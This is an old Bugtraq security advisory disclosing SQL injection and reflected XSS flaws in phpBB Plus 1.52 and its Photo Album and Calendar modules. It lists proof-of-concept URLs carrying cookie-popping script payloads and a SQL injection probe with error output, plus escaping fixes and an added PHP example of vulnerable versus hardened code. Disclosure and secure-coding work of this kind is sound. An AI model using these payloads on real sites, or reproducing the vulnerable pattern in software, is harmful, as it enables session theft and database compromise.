List: bugtraq
Subject: Multiple Sql injection and XSS vulnerabilities in phpBB Plus
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-04-13 22:32:03
Message-ID: 20050413223203.25005.qmail () www ! securityfocus ! com
Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: Medium
Title: Multiple SQL injection and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its modules.
Date: 13/04/2005
Vendor: PhpBB2 Plus and Smartor
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/
Summary: There are multiple SQL injection and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its modules.
Proof of Concept Exploits:
PhpBB Plus v.1.52 and below
http://localhost/groupcp.php?g=881&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/index.php?c=1&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=5e4b2554e73f8ca07f348b5f68c85217
Pops cookie
http://localhost/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=5e4b2554e73f8ca07f348b5f68c85217
Pops cookie
http://localhost/portal.php?article=0&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59
Pops cookie
http://localhost/viewforum.php?f=1&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/viewtopic.php?p=58834&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
Photo Album v2.0.53
http://localhost/album_search.php?mode='SQL_INJECTION&search=dcrab
SQL INJECTION
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_c
SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM phpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_cat_id = 0 AND p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' ORDER BY p.pic_time DESC
Line : 105
File : album_search.php
http://localhost/album_cat.php?cat_id=5&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/album_comment.php?pic_id=224&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
Calendar MOD
http://localhost/calendar_scheduler.php?d=1113174000&mode=&start='"><script>alert(document.cookie)</script>&%3bsid=d32836b8178e5d62b2b173ed177e4b0d
Pops cookie
Possible Fixes: Escaping user input with mysql_escape_string(), mysql_real_escape_string() or similar functions before passing it to the MySQL database, and with htmlspecialchars() before echoing it to the screen, would solve these problems.
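As an added example (not the advisory's or phpBB's own code), the following hypothetical PHP handler shows the two patterns behind the proof-of-concept URLs above, a column selector and search string built into SQL and a session id reflected into HTML, next to the escaping and allow-listing the fix section recommends. The mysql_real_escape_string() call assumes the legacy PHP mysql extension that phpBB 2 used, and the 32-hex-character sid format is taken from the sids shown in the URLs above.

```php
<?php
// Added illustration, not code from phpBB Plus or the Photo Album MOD.
// Hypothetical search handler: a column selector ($mode) and a search
// string ($search) are built into SQL, and a session id ($sid) is
// reflected into HTML, first unsafely and then in hardened form.

// --- Vulnerable pattern (for comparison only) ---
function build_search_sql_vulnerable($mode, $search)
{
    // $mode is dropped straight into the statement as a column name and
    // $search is only quoted, so neither survives crafted input.
    return "SELECT p.pic_id, p.pic_title FROM phpbb_album AS p "
         . "WHERE p.pic_approval = 1 AND $mode LIKE '%$search%'";
}

// --- Hardened pattern ---
function build_search_sql($link, $mode, $search)
{
    // A column name cannot be escaped; it must come from a fixed list.
    $columns = array('title' => 'p.pic_title', 'desc' => 'p.pic_desc');
    if (!isset($columns[$mode])) {
        $mode = 'title';            // fall back instead of trusting input
    }
    // Escape quotes and backslashes for MySQL, then the LIKE wildcards
    // too, so a search for "100%" does not silently match every row.
    $search = mysql_real_escape_string($search, $link);
    $search = str_replace(array('%', '_'), array('\\%', '\\_'), $search);
    return "SELECT p.pic_id, p.pic_title FROM phpbb_album AS p "
         . "WHERE p.pic_approval = 1 AND {$columns[$mode]} LIKE '%$search%'";
}

// sid is echoed back into page links; encode it for the HTML context
// and reject anything that is not a 32-character hex session id.
function link_with_sid($base, $sid)
{
    if (!preg_match('/^[0-9a-f]{32}$/', $sid)) {
        $sid = '';
    }
    return htmlspecialchars($base . '?sid=' . $sid, ENT_QUOTES);
}
```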
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with php.